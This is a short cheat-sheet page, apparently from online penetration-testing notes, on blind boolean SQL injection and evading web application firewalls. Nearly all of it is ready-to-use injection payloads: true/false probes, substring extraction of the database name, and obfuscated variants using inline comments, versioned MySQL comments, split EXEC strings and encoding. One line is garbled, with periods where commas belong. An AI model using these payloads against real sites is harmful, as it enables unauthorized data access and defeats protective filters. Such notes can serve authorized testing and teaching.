Blind Boolean based SQL & Evasion Techniques

Blind Boolean based SQL

  • 11' and 'N' = 'N TRUE

  • 11' and 'N'= 'A False

  • substring('Ahmed'.1.1)='A' => True

select substring(database(),1,1)='d'

Evasion Techniques

  • WAF

    • ' or 1-1 --+

      • or 2>1

      • 'or 'hacktor'>'a'

    • '/*!12345order*/by 7#

    • url encode,hex etc..

    • EXEC('sele','ct')

    • "UNION SELECT"

    • '/**/or/**/1/**/=/**/1/**/

    • Hackbar => Cyberfox

PreviousSQL injectionNextSQL

Last updated